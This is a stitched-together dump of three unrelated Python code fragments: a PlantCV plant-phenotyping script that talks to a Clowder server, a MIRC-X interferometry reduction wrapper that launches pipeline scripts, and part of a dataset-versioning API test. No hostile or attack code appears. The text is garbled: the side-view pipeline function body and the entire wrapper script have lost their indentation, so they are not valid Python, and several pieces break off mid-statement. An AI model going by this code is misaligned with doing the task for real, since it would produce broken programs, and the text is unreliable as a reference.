            # rotation angle; empty string means "not found".
            nir_id = ''
            if 'near-infrared' in metadata:
                if perspective in metadata['near-infrared']:
                    if rotation_angle in metadata['near-infrared'][perspective]:
                        nir_id = metadata['near-infrared'][perspective][rotation_angle]['img_id']
            if len(nir_id) == 0:
                # Bug fix: StandardError was removed in Python 3, so the original
                # raise would itself fail with NameError; RuntimeError is the
                # portable equivalent for a fatal processing error.
                raise RuntimeError("No NIR image found matching VIS image {0}".format(vis_id))
            # Add experiment metadata to the traits table
            traits['plant_barcode'] = img_meta['content']['plant_barcode']
            traits['genotype'] = img_meta['content']['genotype']
            traits['treatment'] = img_meta['content']['treatment']
            # imagedate must be in format YYYY-MM-DDTHH:MM:SS.sss e.g. "2014-06-23T16:55:57.625"
            imgdate = img_meta['content']['imagedate']
            if imgdate.find(" ") > -1:
                imgdate = imgdate.replace(" ", "T")
            traits['imagedate'] = imgdate
            if perspective == 'side-view':
                process_sv_images(sess, args.url, vis_id, nir_id, traits)
            elif perspective == 'top-view':
                process_tv_images(sess, args.url, vis_id, nir_id, traits)

    # Save traits table
    # NOTE(review): this module defines its own generate_traits_list();
    # confirm pcv.generate_traits_list is the intended implementation.
    trait_list = pcv.generate_traits_list(traits)
    outfile = '%s.csv' % args.dataset
    generate_average_csv(outfile, fields, trait_list)
    upload_file_to_clowder(sess, args.url, outfile, args.dataset, {outfile : json.dumps({'type' : 'CSV traits table'})})
    os.remove(outfile)
# Utility functions for modularity between command line and extractors
###########################################
def get_traits_table():
    """Return the traits table schema and an initialized record.

    Returns:
        (fields, traits): fields is the ordered tuple of CSV column
        names; traits is a dict pre-populated with empty values plus
        the fixed access level, species, and site entries. List-valued
        entries accumulate one measurement per processed image.
    """
    fields = ('entity', 'cultivar', 'treatment', 'local_datetime', 'sv_area', 'tv_area', 'hull_area',
              'solidity', 'height', 'perimeter', 'access_level', 'species', 'site')
    traits = dict(
        plant_barcode='',
        genotype='',
        treatment='',
        imagedate='',
        sv_area=[],
        tv_area='',
        hull_area=[],
        solidity=[],
        height=[],
        perimeter=[],
        access_level='2',
        species='Sorghum bicolor',
        site='Danforth Plant Science Center Bellweather Phenotyping Facility',
    )
    return (fields, traits)
def generate_traits_list(traits):
    """Flatten the traits record into the ordered row used by the CSV table.

    List-valued measurements (collected once per image) are reduced to a
    single value via average_trait; scalar entries pass through unchanged.
    """
    return [
        traits['plant_barcode'],
        traits['genotype'],
        traits['treatment'],
        traits['imagedate'],
        average_trait(traits['sv_area']),
        traits['tv_area'],
        average_trait(traits['hull_area']),
        average_trait(traits['solidity']),
        average_trait(traits['height']),
        average_trait(traits['perimeter']),
        traits['access_level'],
        traits['species'],
        traits['site'],
    ]
def generate_average_csv(fname, fields, trait_list):
    """Generate a two-line CSV called fname: a header row and one data row.

    Inputs:
    fname      = output file path
    fields     = iterable of column names
    trait_list = iterable of row values (stringified with str())

    Returns:
    fname (unchanged), for caller convenience.
    """
    # Context manager guarantees the handle is closed (and data flushed)
    # even if a write raises, unlike the original open()/close() pair.
    with open(fname, 'w') as csv_file:
        csv_file.write(','.join(map(str, fields)) + '\n')
        csv_file.write(','.join(map(str, trait_list)) + '\n')
    return fname
# Get list of files for a Clowder dataset
###########################################
def clowder_dataset_filelist(session, url, dataset):
    """Return a list of files for a Clowder Dataset.

    Inputs:
    session = requests session object
    url = Clowder URL
    dataset = Clowder dataset key

    Returns:
    ret = requests response object for the dataset listFiles endpoint

    :param session: requests session object
    :param url: str
    :param dataset: str
    :return: requests return object
    """
    try:
        ret = session.get(posixpath.join(url, "api/datasets", dataset, "listFiles"))
    # Bug fix: the exceptions module lives on the requests package, not on a
    # Session instance; "session.exceptions" would raise AttributeError and
    # mask the original network error.
    except requests.exceptions.RequestException as e:
        print(e)
        sys.exit(1)
    return ret
# Get Clowder file metadata
###########################################
def clowder_file_metadata(session, url, fileid):
    """Get metadata for a file in Clowder.

    Inputs:
    session = requests session object
    url = Clowder URL
    fileid = Clowder file key

    Returns:
    ret = requests response object for the file metadata.jsonld endpoint

    :param session: requests session object
    :param url: str
    :param fileid: str
    :return: requests return object
    """
    try:
        ret = session.get(posixpath.join(url, "api/files", fileid, "metadata.jsonld"))
    # Bug fix: the exceptions module lives on the requests package, not on a
    # Session instance; "session.exceptions" would raise AttributeError and
    # mask the original network error.
    except requests.exceptions.RequestException as e:
        print(e)
        sys.exit(1)
    return ret
# Build a metadata set for a dataset
###########################################
def get_metadata(session, url, filelist):
    """Build a metadata index for a Clowder dataset.

    Queries Clowder for each file's metadata and indexes the entries by
    camera_type -> perspective -> rotation_angle, stashing the Clowder
    file id on each entry as 'img_id'.

    Inputs:
    session = requests session object
    url = Clowder URL
    filelist = Clowder API response object for the datasets listFiles method

    Returns:
    metadata = Metadata dictionary

    :param session: requests session object
    :param url: str
    :param filelist: requests return object
    :return: metadata: dictionary
    """
    metadata = {}
    for clowder_img in filelist.json():
        # Fetch this image's metadata records from Clowder
        response = clowder_file_metadata(session, url, clowder_img['id'])
        # Metadata from multiple extractors may be present; keep only records
        # uploaded through the (deprecated) user API, identified by user_id.
        for extractor in response.json():
            if "user_id" not in extractor['agent']:
                continue
            content = extractor['content']
            # Record the Clowder file id for later download
            extractor['img_id'] = clowder_img['id']
            by_perspective = metadata.setdefault(content['camera_type'], {})
            by_angle = by_perspective.setdefault(content['perspective'], {})
            by_angle[content['rotation_angle']] = extractor
    return metadata
def serialize_color_data(values):
    """Convert a sequence of color-channel values to a JSON-serializable list of floats.

    :param values: iterable of numbers (or numeric strings)
    :return: list of float
    """
    # Renamed parameter: the original was called "list", shadowing the builtin.
    return [float(x) for x in values]
# Process side-view images
###########################################
def process_sv_images(session, url, vis_id, nir_id, traits, debug=None):
    """Process side-view images from Clowder.

    Downloads the VIS and NIR images, runs the side-view PlantCV pipeline
    on the pair, and pushes the resulting per-image traits back to Clowder
    as file metadata.

    Inputs:
    session = requests session object
    url = Clowder URL
    vis_id = The Clowder ID of an RGB image
    nir_id = The Clowder ID of an NIR grayscale image
    traits = traits table (dictionary)
    debug = None, print, or plot. Print = save to file, Plot = print to screen

    :param session: requests session object
    :param url: str
    :param vis_id: str
    :param nir_id: str
    :param traits: dict
    :param debug: str
    :return traits: dict
    """
    def _fetch_image(file_id):
        # Download a file from Clowder and decode it with OpenCV
        # (flag -1 keeps the image's native channel count and depth).
        resp = session.get(posixpath.join(url, "api/files", file_id), stream=True)
        return cv2.imdecode(np.asarray(bytearray(resp.content), dtype="uint8"), -1)

    vis_img = _fetch_image(vis_id)
    nir_gray = _fetch_image(nir_id)
    # The pipeline needs both grayscale and 3-channel versions of the NIR image
    nir_rgb = cv2.cvtColor(nir_gray, cv2.COLOR_GRAY2BGR)
    vis_traits, nir_traits = process_sv_images_core(vis_id, vis_img, nir_id, nir_rgb, nir_gray, traits, debug)
    # Record per-image PlantCV outputs back onto the Clowder files
    add_plantcv_metadata(session, url, vis_id, vis_traits)
    add_plantcv_metadata(session, url, nir_id, nir_traits)
    return traits
def process_sv_images_core(vis_id, vis_img, nir_id, nir_rgb, nir_cv2, traits, debug=None):
# Pipeline step
device = 0
# Convert RGB to HSV and extract the Saturation channel
device, s = pcv.rgb2gray_hsv(vis_img, 's', device, debug)
# Threshold the Saturation image
device, s_thresh = pcv.binary_threshold(s, 36, 255, 'light', device, debug)
# Median Filter
device, s_mblur = pcv.median_blur(s_thresh, 5, device, debug)
device, s_cnt = pcv.median_blur(s_thresh, 5, device, debug)
# Fill small objects
# device, s_fill = pcv.fill(s_mblur, s_cnt, 0, device, args.debug)
# Convert RGB to LAB and extract the Blue channel
device, b = pcv.rgb2gray_lab(vis_img, 'b', device, debug)
# Threshold the blue image
device, b_thresh = pcv.binary_threshold(b, 137, 255, 'light', device, debug)
device, b_cnt = pcv.binary_threshold(b, 137, 255, 'light', device, debug)
# Fill small objects
# device, b_fill = pcv.fill(b_thresh, b_cnt, 10, device, args.debug)
# Join the thresholded saturation and blue-yellow images
device, bs = pcv.logical_and(s_mblur, b_cnt, device, debug)
# Apply Mask (for vis images, mask_color=white)
device, masked = pcv.apply_mask(vis_img, bs, 'white', device, debug)
# Convert RGB to LAB and extract the Green-Magenta and Blue-Yellow channels
device, masked_a = pcv.rgb2gray_lab(masked, 'a', device, debug)
device, masked_b = pcv.rgb2gray_lab(masked, 'b', device, debug)
# Threshold the green-magenta and blue images
device, maskeda_thresh = pcv.binary_threshold(masked_a, 127, 255, 'dark', device, debug)
device, maskedb_thresh = pcv.binary_threshold(masked_b, 128, 255, 'light', device, debug)
# Join the thresholded saturation and blue-yellow images (OR)
device, ab = pcv.logical_or(maskeda_thresh, maskedb_thresh, device, debug)
device, ab_cnt = pcv.logical_or(maskeda_thresh, maskedb_thresh, device, debug)
# Fill small noise
device, ab_fill1 = pcv.fill(ab, ab_cnt, 200, device, debug)
# Dilate to join small objects with larger ones
device, ab_cnt1 = pcv.dilate(ab_fill1, 3, 2, device, debug)
device, ab_cnt2 = pcv.dilate(ab_fill1, 3, 2, device, debug)
# Fill dilated image mask
device, ab_cnt3 = pcv.fill(ab_cnt2, ab_cnt1, 150, device, debug)
device, masked2 = pcv.apply_mask(masked, ab_cnt3, 'white', device, debug)
# Convert RGB to LAB and extract the Green-Magenta and Blue-Yellow channels
device, masked2_a = pcv.rgb2gray_lab(masked2, 'a', device, debug)
device, masked2_b = pcv.rgb2gray_lab(masked2, 'b', device, debug)
# Threshold the green-magenta and blue images
device, masked2a_thresh = pcv.binary_threshold(masked2_a, | |
<reponame>jdmonnier/mircx_mystic
#! /usr/bin/env python
# -*- coding: iso-8859-15 -*-
import argparse, subprocess, os, glob, socket, datetime, sys
from mircx_pipeline import log, lookup, mailfile, headers, files, summarise
import numpy as np
import matplotlib.pyplot as plt
from astropy.io import fits as pyfits
import smtplib
from contextlib import redirect_stdout
try:
from email.mime.multipart import MIMEMultipart
except ModuleNotFoundError:
from email.MIMEMultipart import MIMEMultipart
try:
from email.mime.text import MIMEText
except ModuleNotFoundError:
from email.MIMEText import MIMEText
try:
from email.mime.base import MIMEBase
except ModuleNotFoundError:
from email.MIMEBase import MIMEBase
from email import encoders
import mirc_bot as slack
class cd:
    """
    Context manager that temporarily changes the current working directory.

    On entry the process chdirs into the requested path; on exit (normal
    or via exception) it chdirs back to wherever it started.
    """
    def __init__(self, newPath):
        # Expand '~' so callers may pass home-relative paths
        self.newPath = os.path.expanduser(newPath)

    def __enter__(self):
        # Remember the starting directory so __exit__ can restore it
        self.savedPath = os.getcwd()
        os.chdir(self.newPath)

    def __exit__(self, etype, value, traceback):
        # Restore the original directory regardless of how the block ended
        os.chdir(self.savedPath)
#####################################################
# Description of script and parsable options
description = \
"""
description use #1:
Wrapper for mircx_reduce.py, mircx_calibrate.py,
mircx_report.py and mircx_transmission.py.
(calibrator checks can now be conducted using the
wrapper: add option --calib-cal=TRUE. NB: requires
CANDID to be installed)
description use #2:
Wrapper for mircx_reduce.py to explore different
values of ncoherent and their effect on vis SNR
and T3PHI error.
"""
epilog = \
"""
examples use #1:
mircx_redcal_wrap.py --dates=2018Oct29,2018Oct28
--ncoherent=5,10 --ncs=1,1 --nbs=4,4 --snr-threshold=2.0,2.0
NB: length of ncoherent, ncs, nbs, snr-threshold must be
equal.
examples use #2:
mircx_redcal_wrap.py --dates=2018Oct25 --ncoh-plots=TRUE
--email=<EMAIL>
"""
parser = argparse.ArgumentParser(description=description,epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter,add_help=True)
TrueFalseDefault = ['TRUE','FALSE','TRUEd']
TrueFalse = ['TRUE','FALSE']
TrueFalseOverwrite = ['TRUE','FALSE','OVERWRITE']
parser.add_argument("--raw-dir",dest="raw_dir",default='/data/CHARADATA/MIRCX',type=str,
help="directory base for the raw data paths [%(default)s]")
parser.add_argument("--red-dir",dest="red_dir",default='/data/MIRCX/reduced',type=str,
help="directory base for the reduced data paths [%(default)s]")
parser.add_argument("--dates",dest="dates",type=str,
help="comma-separated list of observation dates to be reduced [%(default)s]")
preproc = parser.add_argument_group ('(1) preproc',
'\nSet of options used to control the book-keeping'
' as well as the preproc and rts reduction steps.')
preproc.add_argument("--reduce",dest="reduce",default='TRUE',
choices=TrueFalseOverwrite,
help="(re)do the reduction process [%(default)s]")
preproc.add_argument("--ncs",dest="ncs",type=str,default='1d',
help="list of number of frame-offset for cross-spectrum [%(default)s]")
preproc.add_argument("--nbs",dest="nbs",type=str,default='4d',
help="list of number of frame-offset for bi-spectrum [%(default)s]")
preproc.add_argument ("--bbias", dest="bbias",type=str,default='TRUEd',
help="list of bools (compute the BBIAS_COEFF product [%(default)s]?)")
preproc.add_argument("--max-integration-time-preproc", dest="max_integration_time_preproc",
default='30.d',type=str,
help='maximum integration into a single file, in (s).\n'
'This apply to PREPROC, and RTS steps [%(default)s]')
oifits = parser.add_argument_group ('(2) oifits',
'\nSet of options used to control the oifits\n'
' reduction steps.')
oifits.add_argument("--ncoherent",dest="ncoherent",type=str,default='10d',
help="list of number of frames for coherent integration [%(default)s]")
oifits.add_argument("--snr-threshold",dest="snr_threshold",type=str,default='2.0d',
help="list of SNR threshold for fringe selection [%(default)s]")
oifits.add_argument("--flux-threshold",dest="flux_threshold",type=str,default='10.0d',
help="list of flux threshold for faint signal rejection [%(default)s]")
oifits.add_argument("--max-integration-time-oifits", dest="max_integration_time_oifits",
default='150.d',type=str,
help='maximum integration into a single file, in (s).\n'
'This apply to OIFITS steps [%(default)s]')
calib = parser.add_argument_group ('(3) calibrate',
'\nSet of options used to control the calibration steps.')
calib.add_argument("--calibrate",dest="calibrate",default='TRUE',
choices=TrueFalseOverwrite,
help="(re)do the calibration process [%(default)s]")
calib.add_argument("--targ-list",dest="targ_list",default='mircx_targets.list',type=str,
help="local database to query to identify SCI and CAL targets [%(default)s]")
calib.add_argument("--calib-cal",dest="calibCal",default='FALSE',
choices=TrueFalse, help="calibrate the calibrators? [%(default)s]")
summary = parser.add_argument_group ('(4) summary',
'\nSet of options used to control the summary report\n'
'file production and email alerts.')
summary.add_argument("--email",dest="email",type=str,default='',
help='email address to send summary report file TO [%(default)s]')
summary.add_argument("--sender",dest="sender",type=str,default='<EMAIL>',
help='email address to send summary report file FROM [%(default)s]')
compare = parser.add_argument_group ('(5) compare',
'\nOptions used to control the exploration of the impact'
'of varying ncoherent on the vis SNR and T3ERR.')
compare.add_argument("--ncoh-plots", dest="ncoh_plots",default='FALSE',
choices=TrueFalse,
help="use the wrapper to produce plots of ncoherent vs\n"
"vis SNR and T3ERR [%(default)s].")
# Parse arguments:
argopt = parser.parse_args ()
# Verbose:
elog = log.trace('mircx_redcal_wrapper')
# Check length of ncs,nbs,mitp,bbias,snr,mito and dates are equal
dates = argopt.dates.split(',')
ncs = str(argopt.ncs).split(',')
nbs = str(argopt.nbs).split(',')
mitp = str(argopt.max_integration_time_preproc).split(',')
bbias = str(argopt.bbias).split(',')
snr = str(argopt.snr_threshold).split(',')
fth = str(argopt.flux_threshold).split(',')
mito = str(argopt.max_integration_time_oifits).split(',')
for item in [ncs,nbs,mitp,bbias,snr,fth,mito]:
if isinstance(item, str):
item = [item]
if len(ncs) == 1 and 'd' in ncs[0]:
# Account for some being default settings:
ncs = [ncs[0].replace('d','')]*len(dates)
if len(nbs) == 1 and 'd' in nbs[0]:
# Account for some being default settings:
nbs = [nbs[0].replace('d','')]*len(dates)
if len(mitp) == 1 and 'd' in mitp[0]:
# Account for some being default settings:
mitp = [mitp[0].replace('.d','')]*len(dates)
if len(bbias) == 1 and 'd' in bbias[0]:
# Account for some being default settings:
bbias = [bbias[0].replace('d','')]*len(dates)
if len(snr) == 1 and 'd' in snr[0]:
# Account for some being default settings:
snr = [snr[0].replace('d','')]*len(dates)
if len(fth) == 1 and 'd' in fth[0]:
# Account for some being default settings:
fth = [fth[0].replace('d','')]*len(dates)
if len(mito) == 1 and 'd' in mito[0]:
# Account for some being default settings:
mito = [mito[0].replace('.d','')]*len(dates)
if len(ncs) == len(nbs) == len(mitp) == len(bbias) == len(snr) == len(fth) == len(mito) == len(dates):
log.info('Length of reduction options checked: ok')
else:
log.error('Error in setup: length of options is not equal!')
sys.exit()
# Force choices of nbs and ncs when bbias=TRUE:
for bb in range(0, len(bbias)):
if bbias[bb] == 'TRUE':
log.info('bbias instance set to true so setting corresponding ncs=1 and nbs=0')
ncs[bb] = 1
nbs[bb] = 0
elif bbias[bb] != 'FALSE':
log.error('Option '+str(bbias[bb])+' not a valid input for bbias')
sys.exit()
# check argopt.ncoherent:
ncoh = str(argopt.ncoherent).split(',')
if argopt.ncoh_plots == 'FALSE':
if len(ncoh) == 1 and 'd' in ncoh[0]:
ncoh = [ncoh[0].replace('d','')]*len(dates)
elif len(ncoh) != len(dates):
log.error("Error: length of --ncoherent doesn't match length of --dates!")
sys.exit()
else:
if len(ncoh) == 1 and 'd' in ncoh[0]:
ncoh = range(2,16)
# remove '/' from end of the reduction and raw base directories
if argopt.raw_dir[-1] == '/':
rawBase = argopt.raw_dir[:-1]
else:
rawBase = argopt.raw_dir
if argopt.red_dir[-1] == '/':
redBase = argopt.red_dir[:-1]
else:
redBase = argopt.red_dir
# Ensure emailing will work:
try:
pw = os.environ['MAILLOGIN']
except KeyError:
log.error('Password for '+argopt.sender+' not found!')
log.info('The password for the email account parsed to --sender')
log.info(' needs to be saved to environment variable $MAILLOGIN.')
sys.exit()
# Ensure that the pipeline can be found
try:
ext = os.environ['MIRCX_PIPELINE']
except KeyError:
log.error('Environment variable $MIRCX_PIPELINE not found')
log.info('Please rectify this before continuing')
sys.exit()
if not os.path.isfile(os.environ['MIRCX_PIPELINE']+'/mircx_pipeline/'+argopt.targ_list):
log.error(os.environ['MIRCX_PIPELINE']+'/mircx_pipeline/'+argopt.targ_list+' not found!')
log.info('Please rectify this before continuing')
sys.exit()
else:
localDB = os.environ['MIRCX_PIPELINE']+'/mircx_pipeline/'+argopt.targ_list
# ^-- this is the local target history database
for d in range(0, len(dates)):
# special setting for execution on protostar @ exeter:
if socket.gethostname() in ['protostar','mircx','yso']:
rawBase_p = rawBase+'/'+dates[d][0:7]
rawBase = rawBase_p
# 1. Make directory dates_nbsncsbbiasmitp in argopt.red-dir
if bbias[d] == 'TRUE':
bbstr = 'T'
else:
bbstr = 'F'
suf1 = '_nbs'+str(nbs[d])+'ncs'+str(ncs[d])+'bbias'+bbstr+'mitp'+mitp[d]
redDir = redBase+'/'+dates[d]+suf1
files.ensure_dir(redDir)
# 2. run reduce.py with --oifits=FALSE
opt1 = '--ncs='+str(ncs[d])+' --nbs='+str(nbs[d])+' --bbias='+str(bbias[d])
opt2 = ' --max-integration-time-preproc='+str(mitp[d])
opts = opt1+opt2
rawDir = rawBase+'/'+dates[d]
with cd(redDir):
com = "mircx_reduce.py "+opts+" --raw-dir="+rawDir
ma = " --preproc-dir="+redDir+"/preproc --rts-dir="+redDir+"/rts"
nd = " --oifits=FALSE --reduce="+argopt.reduce
pipe = "> nohup_preproc_rts.out"
with open("nohup_preproc_rts.out", 'w') as output:
output.write('\n')
log.info('Execute nohup '+com+ma+nd+' '+pipe)
subprocess.call('nohup '+com+ma+nd+' '+pipe+' &', shell=True)
nf = open('nohup_preproc_rts.out', 'r')
ll = 0
while True:
nf.seek(ll,0)
last_line = nf.read()
ll = nf.tell()
if last_line:
print(last_line.strip())
if 'Total memory:' in last_line:
break
# 3. Make directory snrfthmito in argopt.red-dir/dates_nbsncsbbiasmitp
suf2 = 'snr'+str(snr[d]).replace('.','p')+'fth'+str(fth[d]).replace('.','p')+'mito'+str(mito[d])
files.ensure_dir(redDir+'/'+suf2)
oiDir = redDir+'/'+suf2+"/oifits_nc"+str(ncoh[d])
# 4: identify calibrators
targs = lookup.targList(dates[d],rawBase,redDir) # produces target summary file if directory is new
calInfo, scical = lookup.queryLocal(targs, localDB)
if argopt.ncoh_plots == 'FALSE':
# --------------------------------------------------------------
# 5. Run reduce.py with --rts=FALSE and --preproc=FALSE
# assuming different ncoherent are for different argopt.dates
# --------------------------------------------------------------
opt3 = ' --max-integration-time-oifits='+str(mito[d])+' --snr-threshold='+str(snr[d])+' --flux-threshold='+str(fth[d])
opts2 = opt1+' --ncoherent='+str(ncoh[d])+opt3
with cd(redDir+'/'+suf2):
com = "mircx_reduce.py "+opts2+" --raw-dir="+rawDir+" --preproc=FALSE"
ma = " --preproc-dir="+redDir+"/preproc --rts=FALSE --rts-dir="+redDir+"/rts"
nd = " --oifits-dir="+oiDir+" --rm-preproc=TRUE --rm-rts=TRUE --reduce="+argopt.reduce
pipe = "> nohup_oifits.out"
with open("nohup_oifits.out", 'w') as output:
output.write('\n')
log.info('Execute nohup '+com+ma+nd+' '+pipe)
subprocess.call('nohup '+com+ma+nd+' '+pipe+' &', shell=True)
nf = open('nohup_oifits.out', 'r')
ll = 0
while True:
nf.seek(ll,0)
last_line = nf.read()
ll = nf.tell()
if last_line:
print(last_line.strip())
if 'Total memory:' in last_line:
break
# 6. Check that the oifits step successfully created .fits files in oiDir:
if os.path.isdir(oiDir):
if len(glob.glob(oiDir+'/*.fits')) > 0:
redF = False # reduction did not fail
# a: run report.py script
with cd(oiDir):
command = "mircx_report.py --oifits-dir="+oiDir
pipe = " > nohup_report.out"
with open('nohup_report.out', 'w') as output:
output.write('\n')
log.info('Execute nohup '+command+' '+pipe)
subprocess.call("nohup "+command+' '+pipe+' &', shell=True)
nf = open('nohup_report.out', 'r')
ll = 0
while True:
nf.seek(ll,0)
last_line = nf.read()
ll = nf.tell()
if last_line:
print(last_line.strip())
if 'Total memory:' in last_line:
break
# b: run mircx_transmission.py
today = datetime.datetime.strptime(dates[d], '%Y%b%d')
nextDay = today + datetime.timedelta(days=1)
nD = nextDay.strftime('%Y%b%d')
with cd(redDir):
com = "mircx_transmission.py --dir="+redBase+" --num-nights=14"
ma = " --targ-list="+argopt.targ_list
nd = " --oifits-dir="+suf2+"/oifits_nc"+str(ncoh[d])
pipe = "> nohup_transmission.out"
with open('nohup_transmission.out', 'w') as output:
output.write('\n')
log.info('Execute nohup '+com+ma+nd+' '+pipe)
subprocess.call("nohup "+com+ma+nd+' '+pipe+' &', shell=True)
nf = open('nohup_transmission.out', 'r')
ll = 0
while True:
nf.seek(ll,0)
last_line = nf.read()
ll = nf.tell()
if last_line:
print(last_line.strip())
if 'Total memory:' in last_line:
break
# d: run calibrate.py
if | |
of the versions and the files in that version"""
#Definitions
subj = URIRef(self.getManifestUri("datasets/TestSubmission"))
base = self.getManifestUri("datasets/TestSubmission/")
dcterms = "http://purl.org/dc/terms/"
ore = "http://www.openarchives.org/ore/terms/"
oxds = "http://vocab.ox.ac.uk/dataset/schema#"
stype = URIRef(oxds+"DataSet")
#---------Version 0
# Create a new dataset, check response
self.createSubmissionDataset()
# Access and check list of contents
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),10,'Graph length %i' %len(rdfgraph))
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 3, "Parts")
#---------Version 1
# Upload zip file, check response
zipdata = self.uploadSubmissionZipfile()
# Access and check list of contents
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),12,'Graph length %i' %len(rdfgraph))
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata, zipfile, "Difference between local and remote zipfile!")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 4, "Parts")
# Access and check list of contents of version 0
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission?version=0",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),10,'Graph length %i' %len(rdfgraph))
#---------Version 2
# Upload zip file, check response
zipdata2 = self.uploadSubmissionZipfile(file_to_upload="testdir2.zip")
# Access and check list of contents
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),13,'Graph length %i' %len(rdfgraph))
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata, zipfile, "Difference between local and remote zipfile - testdir.zip!")
(resp, zipfile2) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir2.zip",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata2, zipfile2, "Difference between local and remote zipfile - testdir2.zip!")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 5, "Parts")
#---------Version 3
# Delete file, check response
resp = self.doHTTP_DELETE(
resource="datasets/TestSubmission/testdir.zip",
expect_status=200, expect_reason="OK")
# Access and check list of contents
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),12,'Graph length %i' %len(rdfgraph))
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip",
expect_status=404, expect_reason="Not Found")
(resp, zipfile2) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir2.zip",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata2, zipfile2, "Difference between local and remote zipfile - testdir2.zip!")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 4, "Parts")
#---------Version 4
# Update zip file, check response
zipdata3 = self.updateSubmissionZipfile(file_to_upload="testrdf4.zip", filename="testdir2.zip")
# Access and check list of contents
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),12,'Graph length %i' %len(rdfgraph))
# Access and check zip file content
(resp, zipfile) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir.zip",
expect_status=404, expect_reason="Not Found")
(resp, zipfile2) = self.doHTTP_GET(
resource="datasets/TestSubmission/testdir2.zip",
expect_status=200, expect_reason="OK", expect_type="application/zip")
self.assertEqual(zipdata3, zipfile2, "Difference between local and remote zipfile - testdir2.zip!")
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 4, "Parts")
#=========Access each of the versions
#---------Version 0
# Access and check list of contents of version 0
(resp, rdfdata) = self.doHTTP_GET(
resource="datasets/TestSubmission?version=0",
expect_status=200, expect_reason="OK", expect_type="application/rdf+xml")
rdfgraph = Graph()
rdfstream = StringIO(rdfdata)
rdfgraph.parse(rdfstream)
self.assertEqual(len(rdfgraph),10,'Graph length %i' %len(rdfgraph))
self.failUnless((subj,RDF.type,stype) in rdfgraph, 'Testing submission type: '+subj+", "+stype)
self.failUnless((subj,URIRef(dcterms+"created"),None) in rdfgraph, 'dcterms:created')
self.failUnless((subj,URIRef(dcterms+"identifier"),None) in rdfgraph, 'dcterms:identifier')
self.failUnless((subj,URIRef(dcterms+"mediator"),None) in rdfgraph, 'dcterms:mediator')
self.failUnless((subj,URIRef(dcterms+"rights"),None) in rdfgraph, 'dcterms:rights')
self.failUnless((subj,URIRef(dcterms+"license"),None) in rdfgraph, 'dcterms:license')
self.failUnless((subj,URIRef(dcterms+"publisher"),None) in rdfgraph, 'dcterms:publisher')
self.failUnless((subj,URIRef(oxds+"isEmbargoed"),None) in rdfgraph, 'oxds:isEmbargoed')
self.failUnless((subj,URIRef(oxds+"embargoedUntil"),None) in rdfgraph, 'oxds:embargoedUntil')
self.failUnless((subj,URIRef(oxds+"currentVersion"),'0') in rdfgraph, 'oxds:currentVersion')
#Access state information and check
(resp, data) = self.doHTTP_GET(
resource="states/TestSubmission?version=0",
expect_status=200, expect_reason="OK", expect_type="application/json")
state = data['state']
parts = data['parts']
self.assertEqual(len(state.keys()), 11, "States")
self.assertEqual(len(parts.keys()), 3, "Parts")
self.assertEqual(len(parts['4=TestSubmission'].keys()), 13, "File stats for 4=TestSubmission")
self.assertEqual(len(parts['manifest.rdf'].keys()), 13, "File stats for manifest.rdf")
#---------Version 1
# Access and check list of contents of version 1
